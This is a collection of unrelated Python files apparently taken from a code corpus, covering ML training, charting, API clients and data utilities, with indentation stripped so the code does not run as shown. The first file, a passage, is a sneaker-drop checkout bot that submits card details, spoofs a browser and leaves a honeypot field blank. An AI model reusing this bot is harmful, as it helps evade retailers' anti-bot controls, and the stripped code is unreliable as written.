'order[tel]': format_phone(phone_number),
'order[billing_address]': shipping_address_1,
'order[billing_address_2]': shipping_apt_suite,
'order[billing_zip]': shipping_zip,
'order[billing_city]': shipping_city,
'order[billing_state]': shipping_state_abbrv,
'order[billing_country]': country_abbrv,
'same_as_billing_address': '1',
'store_credit_id': '',
'credit_card[type]': card_type,
'credit_card[cnb]': format_card(card_number),
'credit_card[month]': card_exp_month,
'credit_card[year]': card_exp_year,
'credit_card[vval]': card_cvv,
'order[terms]': '1',
'hpcvv': ''
}
headers = {
'Origin': 'https://www.supremenewyork.com',
'Content-Type': 'application/x-www-form-urlencoded',
'Referer': 'https://www.supremenewyork.com/checkout',
'Accept-Encoding': 'gzip, deflate, br'
}
response = session.post('https://www.supremenewyork.com/checkout', data=payload, headers=headers)
if 'Your order has been submitted' in response.text:
print('Checkout was successful!')
sys.exit(0)
else:
soup = bs(response.text, 'html.parser')
print(soup.find('p').text)
sys.exit(0)
def on_time():
# Main
print(datetime.datetime.now())
start = timeit.default_timer()
session1 = requests.Session()
session1.headers.update({
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/52.0.2743.116 Safari/537.36',
'Upgrade-Insecure-Requests': '1',
'DNT': '1',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate, sdch',
'Accept-Language': 'en-US,en;q=0.8,da;q=0.6'
})
if use_early_link:
try:
response1 = session1.get(early_link)
soup = bs(response1.text, 'html.parser')
except:
sys.exit('Unable to connect to site...')
add_to_cart(soup, early_link)
else:
try:
url = base_url + '/shop/all/' + keywords_category[0] + '/'
response1 = session1.get(url)
except:
sys.exit('Unable to connect to site...')
soup1 = bs(response1.text, 'html.parser')
links1 = soup1.find_all('a', href=True)
links_by_keyword1 = []
for link in links1:
for keyword in keywords_category:
product_link = link['href']
if keyword in product_link and 'all' not in product_link:
if product_link not in links_by_keyword1:
links_by_keyword1.append(link['href'])
pool1 = ThreadPool(len(links_by_keyword1))
result1 = pool1.map(product_page, links_by_keyword1) # runtime
sched = BlockingScheduler(timezone='America/New_York')
sched.add_job(on_time, run_date='2016-09-01 10:59:59')
sched.start()
|
503469 | XX_train = np.concatenate((X_train, np.sin(4 * X_train)), axis=1)
XX_test = np.concatenate((X_test, np.sin(4 * X_test)), axis=1)
regressor.fit(XX_train, y_train)
y_pred_test_sine = regressor.predict(XX_test)
plt.plot(X_test, y_test, 'o', label="data")
plt.plot(X_test, y_pred_test_sine, 'o', label="prediction with sine")
plt.plot(X_test, y_pred_test, label='prediction without sine')
plt.legend(loc='best');
|
503520 | import seaborn as sns
from pudzu.charts import *
from pudzu.sandbox.bamboo import *
FONT, fg, bg = sans, "white", "black"
atlas = pd.read_csv("datasets/countries.csv").split_columns(('nationality', 'tld', 'country'), "|").explode('country').set_index('country')
df = pd.read_csv("datasets/eu_foreignleaders.csv")
def entitle(img):
title = Image.from_text("foreign-born European leaders".upper(), FONT(108, bold=True), fg=fg, bg=bg)
subtitle = Image.from_text("the most recent foreign-born head of state and government from each country", FONT(60), fg=fg, bg=bg).pad((0,0,0,10), bg)
FOOTERS = ["""MORE RECENT (BUT LESS GOOD) ALTERNATIVES
1. President <NAME> (1957-65) was born in Nikolsburg which later became part of Czechoslovakia.
Chancellor <NAME> (1918-20/1945) was born in Dolní Dunajovice which later became part of Czechoslovakia.
2. President <NAME> (1994-00) was born in Viipuri which later became part of Russia.
Prussian-born Fre<NAME> was elected king in 1918 but never crowned.
3. President <NAME> (1980-85/90-95) was born in Proti, Ottoman Empire before it became part of Greece.
4. Council Chairman <NAME> (1961-65) was born in Fiume which later became part of Croatia.""",
"""
5. President <NAME> (1997-11) was born in Belfast, Northern Ireland, but at the time Ireland claimed sovereignty over the entire island.
6. Some sources list Prime Minister <NAME> (2009-13) as being born in Grabs, Switzerland, but others claim Vaduz.
7. Monaco-born Mindaugas II was elected King of Lithuania in 1918, but never assumed the crown.
8. President <NAME> (1996-00) was born Tighina which later became part of Moldova.
9. President <NAME> (1991-94) was born in Velykyi Zhytyn, Poland before it became part of Ukraine.
10. During the Nazi Occupation, Netherlands and Norway had a foreign-born Reichskommissar, but also a government in exile.""",
"""FOOTNOTES
11. Hitler's birthplace was part of Germany between 1938 and 1945.
12. Buzek's birthplace was part of Poland between 1938 and 1939.
BARELY FOREIGN (BUT I COULDN'T FIND ANYONE BETTER)
13. De Gasperi's birthplace became part of Italy during his lifetime.
14. Aura's birthplace was part of Finland before it became Russian.
15. Văcăroiu's birthplace was part of Romania before it became Ukrainian.
16. Atatürk's birthplace was part of Turkey before it became Greek.
""",]
footers = [Image.from_text(FOOTER, FONT(24), "white", padding=10, beard_line=True, line_spacing=1) for FOOTER in FOOTERS]
footer = Image.from_row(footers, padding=(20,5), yalign=0)
img = Image.from_column([title, subtitle, img, Rectangle((img.width, 2), "grey"), footer], bg=bg, padding=5).pad(15,bg=bg)
img = img.place(Image.from_text("/u/Udzu", FONT(16), fg=fg, bg=bg, padding=5).pad((1,1,0,0), fg), align=1, padding=10)
return img
grids = []
all_countries = sorted(set(df.country))
for countries in generate_batches(all_countries, ceil(len(all_countries)/3)):
def match(country, type):
match = df[(df.country == country) & (df.type == type)]
return dict(match.iloc[0]) if len(match) else np.nan
ss = [match(country, "s") for country in countries]
gs = [match(country, "g") for country in countries]
table = pd.DataFrame([ss,gs], index=["s","g"], columns=countries)
DEFAULT_IMG = "https://s-media-cache-ak0.pinimg.com/736x/0d/36/e7/0d36e7a476b06333d9fe9960572b66b9.jpg" # "https://upload.wikimedia.org/wikipedia/commons/6/68/Solid_black.png" #
def cell(d):
if non(d) or not get_non(d, 'name'): return None
logger.info(f"{d['country']} / {d['type']}")
img = Image.from_url_with_cache(get_non(d, 'image', DEFAULT_IMG))
return Image.from_column([
Image.from_text(get_non(d, 'name', ''), FONT(16, bold=True),fg=fg, bg=bg, beard_line=True),
Image.from_text(get_non(d, 'role', ''), FONT(16, italics=True),fg=fg, bg=bg, beard_line=True),
img.cropped_resize((200,200), (0.5,get_non(d, 'align', 0.2)) if img.height >= img.width else (get_non(d, 'align', 0.5), 0.5)),
Image.from_text(f"{d['city']}, {d['place']}", FONT(16, bold=False), max_width=200, fg=fg, bg=bg, beard_line=True),
], bg=bg, padding=2).pad(5, bg)
def flag(column):
flag = Image.from_url_with_cache(atlas.flag[table.columns[column]]).to_rgba()
flag = flag.resize_fixed_aspect(height=140) if flag.width / flag.height < 1.3 else flag.resize((200,140))
flag = flag.trim(1).pad(1, "grey").pad((0,10,0,0), bg)
label = Image.from_text(table.columns[column].upper().replace("BOSNIA","BiH"), FONT(20, bold=True),fg=fg,bg=bg,beard_line=True)
return Image.from_column([flag.pad((0,0,0,10),bg=bg), label])
def row_label(row):
return Image.from_text("HEAD OF STATE" if row==0 else "HEAD OF GOV'T", FONT(20, bold=True), fg=fg, bg=bg, padding=(0,10)).pad_to(width=300).transpose(Image.ROTATE_90)
grid = grid_chart(table, cell, col_label=flag, row_label=row_label, bg=bg, yalign=0)
grids.append(grid)
chart = Image.from_column(grids, xalign=0)
chart = entitle(chart)
chart.convert("RGB").save("output/euforeignleaders.jpg")
|
503525 | from typing import List, Union
import pandas as pd
from exceldriver.columns import get_n_cols_after_col
def write_df_to_ws_values(df: pd.DataFrame, ws, begin_col: str = 'A', begin_row: int = 1):
# TODO: multi-index
num_cols = len(df.columns) + 1 # add 1 as index will automatically be converted to col
end_col = get_n_cols_after_col(begin_col, num_cols - 1) # -1 as first col goes in begin_col
end_row = begin_row + len(df)
cell_range = f'{begin_col}{begin_row}:{end_col}{end_row}'
values = _df_to_values_for_insert_into_ws(df)
ws.Range(cell_range).Value = values
def _df_to_values_for_insert_into_ws(df: pd.DataFrame) -> List[List[Union[str, float, int]]]:
temp_df = df.reset_index()
temp_df.fillna('', inplace=True)
temp_df['Date'] = temp_df['Date'].apply(lambda x: x.strftime('%m/%d/%Y') if not isinstance(x, str) else x)
values_list = temp_df.values.tolist()
values_list.insert(0, list(temp_df.columns))
return values_list
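# Hedged example of the conversion helper above (a toy frame with the 'Date' index this
# module expects; values are illustrative):
#
#   df = pd.DataFrame({'Date': pd.to_datetime(['2020-01-01']), 'x': [1.5]}).set_index('Date')
#   _df_to_values_for_insert_into_ws(df)
#   # -> [['Date', 'x'], ['01/01/2020', 1.5]]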
|
503574 | from datetime import datetime
import logging
from django.core.cache import cache
from django.core.exceptions import ObjectDoesNotExist
from edx_rest_api_client.client import EdxRestApiClient
from requests import RequestException
from slumber.exceptions import HttpClientError
from api.backends.base_api_client import BaseApiClient
log = logging.getLogger(__name__)
class OpenEdxApiClient(BaseApiClient, EdxRestApiClient):
"""API client to interact with OpenEdx Course API."""
TOKEN_URL = "/oauth2/access_token"
def __init__(self, content_source):
BaseApiClient.__init__(self, content_source=content_source)
log.debug("Creating new OpenEdx API client...")
token_cache_key = f'api:{self.content_source.o_auth_client.client_id}:token'
access_token = cache.get(token_cache_key)
if not access_token:
access_token, expires_at = self.get_oauth_access_token()
ttl = expires_at - datetime.now()
cache.set(token_cache_key, access_token, ttl.seconds)
EdxRestApiClient.__init__(self, self.url, jwt=access_token)
@property
def url(self):
return f'{self.content_source.host_url}/api/courses/v1/'
def get_oauth_access_token(self):
"""
Request OpenEdx API OAuth2 token.
Token type: JWT (reference: https://jwt.io/).
:return: access_token, expires_at
"""
url = "{host_url}{token_url}".format(
host_url=self.content_source.host_url,
token_url=self.TOKEN_URL
)
log.debug("Requesting oauth token: (url={})".format(url))
try:
oauth_client = self.content_source.o_auth_client
access_token, expires_at = super().get_oauth_access_token(
url=url,
client_id=oauth_client.client_id,
client_secret=oauth_client.client_secret,
token_type='jwt',
)
except ObjectDoesNotExist:
raise HttpClientError(
"OAuth token request failure. Please, configure OAuth client in order to be able make API requests."
)
except ValueError:
log.exception(
"You may want to check your OAuth registration on LTI Provider."
"LTI Provider may be disabled (to enable: LMS config > FEATURES > ENABLE_OAUTH2_PROVIDER: true"
)
raise HttpClientError(
"OAuth token request failure."
)
except RequestException:
log.exception('OAuth2 token request to the OpenEdx LTI Provider failed.')
raise HttpClientError(
"OAuth token request failure."
)
return access_token, expires_at
def get_course_blocks(self, course_id):
blocks = super().get_course_blocks(course_id)
filtered_blocks = ['sequential', 'course', 'chapter', 'vertical']
return [block for block in blocks if block['type'] not in filtered_blocks]
|
503650 | from leapp.models import Model, fields
from leapp.topics import SystemInfoTopic
class QuaggaToFrrFacts(Model):
"""
Model for quagga to frr actors.
A list of configuration files used by quagga. This list is used to add yes/no to
/etc/frr/daemons file. It indicates which daemons from frr should be run.
"""
topic = SystemInfoTopic
active_daemons = fields.List(fields.String())
enabled_daemons = fields.List(fields.String())
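# Hedged usage sketch: an actor would typically produce this model, e.g.
# (the import is the standard leapp actor API; daemon names are illustrative):
#
#   from leapp.libraries.stdlib import api
#   api.produce(QuaggaToFrrFacts(
#       active_daemons=['zebra', 'bgpd'],
#       enabled_daemons=['zebra', 'bgpd', 'ospfd'],
#   ))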
|
503663 | from glob import glob
import os
for file in glob("*/smri/warped_image/fwhm_6.0/*_wtsimt.nii.gz"):
if not os.path.exists(file.replace(".nii.gz", "_2mm.nii.gz")):
os.system("flirt -interp nearestneighbour -in %s -ref %s -applyisoxfm 2 -out %s"%(file, file, file.replace(".nii.gz", "_2mm.nii.gz")))
#os.remove(file) |
503702 | import requests
import datetime
import pandas as pd
from ..app import app
from ..utils import config
from .sqlalchemy_declarative import strydSummary
from ..api.database import engine
from sqlalchemy import func
def auth_stryd_session():
requestJSON = {"email": config.get('stryd', 'username'), "password": config.get('stryd', 'password')}
responseData = requests.post("https://www.stryd.com/b/email/signin", json=requestJSON)
if responseData.status_code != 200:
app.server.logger.debug("Stryd could not authenticate")
authenticated = False
raise Exception("failed password authentication")
else:
app.server.logger.debug("Stryd authenticated")
authenticated = True
tempData = responseData.json()
userID = tempData['id']
sessionID = tempData['token']
return sessionID
##############################
## get the list of workouts ##
##############################
def pull_stryd_data():
sessionID = auth_stryd_session()
today = datetime.datetime.now() + datetime.timedelta(
days=1) # Pass tomorrow's date to ensure no issues with timezones
start = today - datetime.timedelta(days=9999)
headers = {'Authorization': 'Bearer: {}'.format(sessionID)}
url = "https://www.stryd.com/b/api/v1/activities/calendar?srtDate={start}&endDate={today}&sortBy=StartDate".format(
start=start.strftime("%m-%d-%Y"), today=today.strftime("%m-%d-%Y"))
jsonData = {'srtDate': start.strftime("%m-%d-%Y"), 'endDate': today.strftime("%m-%d-%Y"), 'sortBy': 'StartDate'}
responseData = requests.get(url, headers=headers, params=jsonData)
df = pd.DataFrame(responseData.json()['activities']) # returns summary data for each workout
df.rename(columns={
"timestamp": "start_date_local",
"ftp": "stryd_ftp",
"stress": "rss"},
inplace=True)
df['start_date_local'] = df['start_date_local'].apply(datetime.datetime.fromtimestamp)
df.set_index(pd.to_datetime(df['start_date_local']), inplace=True)
# Specify which columns from stryd we want to bring over
df = df[['stryd_ftp',
'total_elevation_gain',
'total_elevation_loss',
'max_elevation',
'min_elevation',
'average_cadence',
'max_cadence',
'min_cadence',
'average_stride_length',
'max_stride_length',
'min_stride_length',
'average_ground_time',
'max_ground_time',
'min_ground_time',
'average_oscillation',
'max_oscillation',
'min_oscillation',
'average_leg_spring',
'rss',
'max_vertical_stiffness',
'stryds',
'elevation',
'temperature',
'humidity',
'windBearing',
'windSpeed',
'windGust',
'dewPoint']]
# Filter df for only new records not yet in DB
    last_stryd_date = app.session.query(func.max(strydSummary.start_date_local))[0][0]
    if last_stryd_date:
        df = df[df.index > last_stryd_date]
if len(df) > 0:
app.server.logger.info('New stryd workouts found!')
# Insert into db
df.to_sql('stryd_summary', engine, if_exists='append', index=True)
app.session.commit()
app.session.remove()
return df
def get_training_distribution(race=1, gender=1, age=1):
sessionID = auth_stryd_session()
headers = {'Authorization': 'Bearer: {}'.format(sessionID)}
url = f"https://www.stryd.com/b/api/v1/users/runner-attribute?race={config.get('stryd', 'compare_against_race_event')}&gender={config.get('stryd', 'compare_against_gender')}&age={config.get('stryd', 'compare_against_age')}"
responseData = requests.get(url, headers=headers)
return responseData.json()
# '''{'attr': {'age': 28,
# 'endurance': 1835,
# 'fatigue_resistance': 1272,
# 'fitness': 3.0895057604261837,
# 'gender': 'male',
# 'muscle_power': 5.38494805940594,
# 'race': '5k',
# 'timestamp': 1594587608,
# 'user_key': '<KEY>'},
# 'fatigue_resistance_threshold': 1,
# 'percentile': {'endurance': 0.05242718446601946,
# 'fatigue_resistance': 0.4,
# 'fitness': 0.1475728155339806,
# 'median_endurance': 5361,
# 'median_fatigue_resistance': 1445,
# 'median_fitness': 3.9397466897464706,
# 'median_muscle_power': 6.089743589743589,
# 'muscle_power': 0.31456310679611654}}
# '''
|
503762 | import logging
from logging import config
import json
import random
from random import shuffle
import argparse
from pprint import pprint
from pathlib import Path
import sys
import os
import gc
import math
import ipdb
from tqdm import tqdm
import numpy as np
import pandas as pd
import adabound
from sklearn.metrics import confusion_matrix
from sklearn.preprocessing import OneHotEncoder
from sklearn import preprocessing
from sklearn.metrics import f1_score, accuracy_score, roc_auc_score
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.autograd import Function
from torch.utils.data import Dataset, DataLoader
import networkx as nx
from torch_geometric.nn import GCNConv, ChebConv, SAGEConv, GINConv, GATConv
import itertools
tqdm.monitor_interval = 0
sys.path.append('../')
def to_device(tensor):
if tensor is not None: return tensor.to("cuda")
def make_dataset_1M(load_sidechannel=False):
r_cols = ['user_id', 'movie_id', 'rating', 'unix_timestamp']
ratings = pd.read_csv('../data/ml-1m/ratings.dat', sep='::', names=r_cols,
encoding='latin-1',engine='python')
shuffled_ratings = ratings.sample(frac=1).reset_index(drop=True)
train_cutoff_row = int(np.round(len(shuffled_ratings) * 0.9))
train_ratings = shuffled_ratings[:train_cutoff_row]
test_ratings = shuffled_ratings[train_cutoff_row:]
if load_sidechannel:
u_cols = ['user_id', 'sex', 'age', 'occupation', 'zip_code']
m_cols = ['movie_id', 'title', 'genre']
users = pd.read_csv('../data/ml-1m/users.dat', sep='::', names=u_cols,
encoding='latin-1', parse_dates=True,engine='python')
movies = pd.read_csv('../data/ml-1m/movies.dat', sep='::', names=m_cols,
encoding='latin-1', parse_dates=True,engine='python')
train_ratings.drop("unix_timestamp", inplace=True, axis=1)
train_ratings_matrix = train_ratings.pivot_table(index=['movie_id'], \
columns=['user_id'], values='rating').reset_index(drop=True)
test_ratings.drop("unix_timestamp", inplace=True, axis=1)
columnsTitles = ["user_id", "rating", "movie_id"]
train_ratings = train_ratings.reindex(columns=columnsTitles) - 1
test_ratings = test_ratings.reindex(columns=columnsTitles) - 1
users.user_id = users.user_id.astype(np.int64)
movies.movie_id = movies.movie_id.astype(np.int64)
users['user_id'] = users['user_id'] - 1
movies['movie_id'] = movies['movie_id'] - 1
if load_sidechannel:
return train_ratings, test_ratings, users, movies
else:
return train_ratings, test_ratings
def create_optimizer(params, mode, *args, **kwargs):
if mode == 'SGD':
opt = optim.SGD(params, *args, momentum=0., **kwargs)
elif mode.startswith('nesterov'):
momentum = float(mode[len('nesterov'):])
opt = optim.SGD(params, *args, momentum=momentum, nesterov=True, **kwargs)
elif mode.lower() == 'adam':
betas = kwargs.pop('betas', (.9, .999))
opt = optim.Adam(params, *args, betas=betas, amsgrad=True,
weight_decay=1e-4, **kwargs)
elif mode.lower() == 'adam_hyp2':
betas = kwargs.pop('betas', (.5, .99))
opt = optim.Adam(params, *args, betas=betas, amsgrad=True, **kwargs)
elif mode.lower() == 'adam_hyp3':
betas = kwargs.pop('betas', (0., .99))
opt = optim.Adam(params, *args, betas=betas, amsgrad=True, **kwargs)
elif mode.lower() == 'adam_sparse':
betas = kwargs.pop('betas', (.9, .999))
opt = optim.SparseAdam(params, *args, weight_decay=1e-4, betas=betas)
elif mode.lower() == 'adam_sparse_hyp2':
betas = kwargs.pop('betas', (.5, .99))
opt = optim.SparseAdam(params, *args, betas=betas)
elif mode.lower() == 'adam_sparse_hyp3':
betas = kwargs.pop('betas', (.0, .99))
opt = optim.SparseAdam(params, *args, betas=betas)
elif mode.lower() == 'adabound':
opt = adabound.AdaBound(params, *args, final_lr=0.1)
else:
raise NotImplementedError()
return opt
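# Hedged usage sketch of create_optimizer (the model below is illustrative; any iterable
# of parameters works):
#
#   model = nn.Linear(10, 1)
#   opt = create_optimizer(model.parameters(), 'adam', lr=1e-3)          # AMSGrad Adam, wd=1e-4
#   opt_sgd = create_optimizer(model.parameters(), 'nesterov0.9', lr=1e-2)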
ltensor = torch.LongTensor
def collate_fn(batch):
if isinstance(batch, np.ndarray) or (isinstance(batch, list) and isinstance(batch[0], np.ndarray)):
return ltensor(batch).contiguous()
else:
return torch.stack(batch).contiguous()
def get_logger(name, log_dir, config_dir):
"""
Creates a logger object
Parameters
----------
name: Name of the logger file
log_dir: Directory where logger file needs to be stored
config_dir: Directory from where log_config.json needs to be read
Returns
-------
A logger object which writes to both file and stdout
"""
config_dict = json.load(open( config_dir + 'log_config.json'))
config_dict['handlers']['file_handler']['filename'] = os.path.join(log_dir, name.replace('/', '-'))
logging.config.dictConfig(config_dict)
logger = logging.getLogger(name)
std_out_format = '%(asctime)s - %(message)s'
consoleHandler = logging.StreamHandler(sys.stdout)
consoleHandler.setFormatter(logging.Formatter(std_out_format))
logger.addHandler(consoleHandler)
return logger
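# Hedged usage sketch of get_logger (paths are illustrative; config_dir must contain a
# log_config.json with a 'file_handler' entry):
#
#   logger = get_logger('ml1m_run1', log_dir='./logs/', config_dir='./config/')
#   logger.info('training started')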
def node_cls_collate_fn(batch):
users = []
genders = []
occupations = []
ages = []
for [user, gender, occupation, age] in batch:
users.append(user)
genders.append(gender)
occupations.append(occupation)
ages.append(age)
users = ltensor(users)
genders = ltensor(genders)
occupations = ltensor(occupations)
ages = ltensor(ages)
return (users, genders, occupations, ages)
def train_node_cls(data_loader, args, model, optimizer):
model.train()
if args.show_tqdm:
data_itr = tqdm(enumerate(data_loader))
else:
data_itr = enumerate(data_loader)
for idx, (user, gender, occupation, age) in data_itr:
if args.use_cuda:
(user, gender, occupation, age) = (user.cuda(), gender.cuda(), occupation.cuda(), age.cuda())
task_loss, preds = model((user, gender, occupation, age))
optimizer.zero_grad()
full_loss = task_loss
full_loss.backward()
optimizer.step()
def test_node_cls(test_fairness_set, args, model, mode='age'):
model.eval()
node_cls_test_loader = DataLoader(test_fairness_set, batch_size=4000, shuffle=False,
drop_last=False,
num_workers=1, pin_memory=True, collate_fn=node_cls_collate_fn)
for idx, (user, gender, occupation, age) in tqdm(enumerate(node_cls_test_loader)):
(user, gender, occupation, age) = (user.cuda(), gender.cuda(), occupation.cuda(), age.cuda())
task_loss, [pred_age, pred_gender, pred_occupation] = model((user, gender, occupation, age))
pred_age = pred_age.max(1)[1]
pred_occupation = pred_occupation.max(1)[1]
pred_gender = (pred_gender > 0.5)
to_np = lambda x: x.detach().cpu().numpy()
pred_age, truth_age = to_np(pred_age), to_np(age)
pred_occupation, truth_occupation = to_np(pred_occupation), to_np(occupation)
pred_gender, truth_gender = to_np(pred_gender), to_np(gender)
macro_gender = f1_score(pred_gender, truth_gender, average='macro') if mode =='gender' else 0
macro_age = f1_score(pred_age, truth_age, average='macro') if mode =='age' else 0
macro_occupation = f1_score(pred_occupation, truth_occupation, average='macro') if mode =='occupation' else 0
roc_auc = roc_auc_score(truth_gender, pred_gender)
if mode =='gender':
conf = confusion_matrix(truth_gender, pred_gender)
elif mode == 'age':
conf = confusion_matrix(truth_age, pred_age)
elif mode == 'occupation':
conf = confusion_matrix(truth_occupation, pred_occupation)
args.logger.info("Confusion Matrix\n"+str(conf))
log = 'Macro F1/AUC: Gender: {:.4f}/{:.4f} Age: {:.4f} Occupation: {:.4f}\n===================='
args.logger.info(log.format(macro_gender, roc_auc, macro_age, macro_occupation))
rms, test_loss = 0,0
return rms, test_loss
def train_gda(data_loader, adv_loader, args, model, optimizer_task, optimizer_adv, pretrain=False):
model.train()
adv_loader = itertools.cycle(adv_loader)
if args.show_tqdm:
data_itr = tqdm(enumerate(zip(data_loader, adv_loader)))
else:
data_itr = enumerate(zip(data_loader, adv_loader))
for idx, (p_batch ,(user, gender, occupation, age)) in data_itr:
if args.use_cuda:
p_batch = p_batch.cuda()
(user, gender, occupation, age) = (user.cuda(), gender.cuda(), occupation.cuda(), age.cuda())
loss_task, preds_task = model(p_batch)
if True:
optimizer_task.zero_grad()
loss_task.backward(retain_graph=True)
optimizer_task.step()
optimizer_task.zero_grad()
if not(pretrain):
loss_adv, (age_pred, gender_pred, occupation_pred) = model.forward_attr((user, gender, occupation, age))
optimizer_adv.zero_grad()
loss_adv.backward(retain_graph=True)
optimizer_adv.step()
optimizer_adv.zero_grad()
def test_gda(dataset, args, model):
test_loader = DataLoader(dataset, batch_size=4000, num_workers=1, collate_fn=collate_fn)
cst_inds = np.arange(args.num_ent, dtype=np.int64)[:, None]
if args.show_tqdm:
data_itr = tqdm(enumerate(test_loader))
else:
data_itr = enumerate(test_loader)
(user, gender, occupation, age) = dataset.user_features
(user, gender, occupation, age) = (user.cuda(), gender.cuda(), occupation.cuda(), age.cuda())
preds_list = []
rels_list = []
for idx, p_batch in data_itr:
p_batch = (p_batch).cuda()
lhs, rel, rhs = p_batch[:, 0], p_batch[:, 1], p_batch[:, 2]
loss_task, preds = model(p_batch)
loss_adv, (age_pred, gender_pred, occupation_pred) = model.forward_attr((user, gender, occupation, age))
rel += 1
preds_list.append(preds.squeeze())
rels_list.append(rel.float())
total_preds = torch.cat(preds_list)
total_rels = torch.cat(rels_list)
predictions = total_preds.round().detach().cpu().numpy()
rms = torch.sqrt(F.mse_loss(total_preds.squeeze(), total_rels.squeeze()))
args.logger.info("Adversarial Loss: {}".format(loss_adv.item()))
args.logger.info("Edge RMSE: {}".format(rms.item()))
return
def train_gcmc(data_loader, counter, args, modelD, optimizer):
if args.show_tqdm:
data_itr = tqdm(enumerate(data_loader))
else:
data_itr = enumerate(data_loader)
for idx, p_batch in data_itr:
if args.use_cuda:
p_batch = p_batch.cuda()
p_batch_var = (p_batch)
task_loss, preds = modelD(p_batch_var)
optimizer.zero_grad()
full_loss = task_loss
full_loss.backward(retain_graph=False)
optimizer.step()
def test_gcmc(dataset, args, modelD):
test_loader = DataLoader(dataset, batch_size=4000, num_workers=1, collate_fn=collate_fn)
cst_inds = np.arange(args.num_ent, dtype=np.int64)[:, None]
if args.show_tqdm:
data_itr = tqdm(enumerate(test_loader))
else:
data_itr = enumerate(test_loader)
preds_list = []
rels_list = []
test_loss_list = []
for idx, p_batch in data_itr:
p_batch_var = (p_batch).cuda()
lhs, rel, rhs = p_batch_var[:, 0], p_batch_var[:, 1], p_batch_var[:, 2]
test_loss, preds = modelD(p_batch_var)
rel += 1
preds_list.append(preds.squeeze())
rels_list.append(rel.float())
test_loss_list.append(test_loss)
total_preds = torch.cat(preds_list)
total_rels = torch.cat(rels_list)
test_loss = torch.mean(torch.stack(test_loss_list))
predictions = total_preds.round().detach().cpu().numpy()
args.logger.info("Confusion Matrix\n"+str(confusion_matrix(total_rels.detach().cpu().numpy(), predictions)))
rms = torch.sqrt(F.mse_loss(total_preds.squeeze(), total_rels.squeeze()))
args.logger.info("Test RMSE: {}".format(rms.item()))
return rms, test_loss
|
503781 | from collections import namedtuple
import os, socket
Message = namedtuple('Message', 'data, response')
class Socket(object):
def __init__(self, host, port, dispatch, max_size = 1024):
self.host = host
self.port = port
self.max_size = max_size
self.dispatch = dispatch
def listen(self):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.sock.bind((self.host, self.port))
while True:
data, address = self.sock.recvfrom(self.max_size)
self.dispatch(Message(data, lambda rdata: self.sock.sendto(rdata, address)))
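# Hedged usage sketch: a minimal UDP echo server built on the class above
# (host and port are illustrative):
#
#   def echo(message):
#       message.response(message.data)
#
#   Socket('127.0.0.1', 9999, echo).listen()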
|
503785 | import argparse
import pickle
import os
import torch
from torch import nn
from torch.nn import functional as F
from torch.utils.data import DataLoader
from torchvision import transforms
from torchvision.models import inception_v3, Inception3
import numpy as np
from tqdm import tqdm
from inception import InceptionV3
import sys
sys.path.append('../')
import common
sys.path.append('../retrieval_model')
import train_retrieval
sys.path.append('../cookgan')
import train_cookgan
from utils_cookgan import compute_txt_feat
from datasets_cookgan import FoodDataset
class Inception3Feature(Inception3):
def forward(self, x):
if x.shape[2] != 299 or x.shape[3] != 299:
x = F.interpolate(x, size=(299, 299), mode='bilinear', align_corners=True)
x = self.Conv2d_1a_3x3(x) # 299 x 299 x 3
x = self.Conv2d_2a_3x3(x) # 149 x 149 x 32
x = self.Conv2d_2b_3x3(x) # 147 x 147 x 32
x = F.max_pool2d(x, kernel_size=3, stride=2) # 147 x 147 x 64
x = self.Conv2d_3b_1x1(x) # 73 x 73 x 64
x = self.Conv2d_4a_3x3(x) # 73 x 73 x 80
x = F.max_pool2d(x, kernel_size=3, stride=2) # 71 x 71 x 192
x = self.Mixed_5b(x) # 35 x 35 x 192
x = self.Mixed_5c(x) # 35 x 35 x 256
x = self.Mixed_5d(x) # 35 x 35 x 288
x = self.Mixed_6a(x) # 35 x 35 x 288
x = self.Mixed_6b(x) # 17 x 17 x 768
x = self.Mixed_6c(x) # 17 x 17 x 768
x = self.Mixed_6d(x) # 17 x 17 x 768
x = self.Mixed_6e(x) # 17 x 17 x 768
x = self.Mixed_7a(x) # 17 x 17 x 768
x = self.Mixed_7b(x) # 8 x 8 x 1280
x = self.Mixed_7c(x) # 8 x 8 x 2048
x = F.avg_pool2d(x, kernel_size=8) # 8 x 8 x 2048
return x.view(x.shape[0], x.shape[1]) # 1 x 1 x 2048
def load_patched_inception_v3():
# inception = inception_v3(pretrained=True)
# inception_feat = Inception3Feature()
# inception_feat.load_state_dict(inception.state_dict())
inception_feat = InceptionV3([3], normalize_input=False)
return inception_feat
@torch.no_grad()
def extract_features(loader, inception, device):
pbar = tqdm(loader)
feature_list = []
for _, imgs, _, _ in pbar:
img = imgs[-1].to(device)
feature = inception(img)[0].view(img.shape[0], -1)
feature_list.append(feature.to('cpu'))
features = torch.cat(feature_list, 0)
return features
if __name__ == '__main__':
from utils_metrics import load_args
device = 'cuda' if torch.cuda.is_available() else 'cpu'
args = load_args()
_, _, txt_encoder, _, _ = train_retrieval.load_model(args.retrieval_model, device)
txt_encoder = txt_encoder.eval().to(device)
ckpt_args, _, netG, _, _, _ = train_cookgan.load_model(args.ckpt_path, device)
netG = netG.eval().to(device)
inception = load_patched_inception_v3()
inception = nn.DataParallel(inception).eval().to(device)
imsize = ckpt_args.base_size * (2 ** (ckpt_args.levels-1))
train_transform = transforms.Compose([
transforms.Resize(int(imsize * 76 / 64)),
transforms.CenterCrop(imsize)])
dataset = FoodDataset(
recipe_file=ckpt_args.recipe_file,
img_dir=ckpt_args.img_dir,
levels=ckpt_args.levels,
part='val',
food_type=ckpt_args.food_type,
base_size=ckpt_args.base_size,
transform=train_transform)
dataset_name = 'Recipe1M'
if ckpt_args.food_type:
dataset_name += f'_{ckpt_args.food_type}'
loader = DataLoader(dataset, batch_size=args.batch_size, num_workers=4)
features = extract_features(loader, inception, device).numpy()
features = features[: args.n_sample]
print(f'extracted {features.shape[0]} features')
mean = np.mean(features, 0)
cov = np.cov(features, rowvar=False)
with open(f'inception_{dataset_name}.pkl', 'wb') as f:
pickle.dump({'mean': mean, 'cov': cov, 'dataset_name': dataset_name}, f) |
503842 | import torch
from torch.utils import data
import json
from pytorch_transformers.tokenization_bert import BertTokenizer
import numpy as np
import random
from utils.data_utils import list2tensorpad, encode_input, encode_image_input
from utils.image_features_reader import ImageFeaturesH5Reader
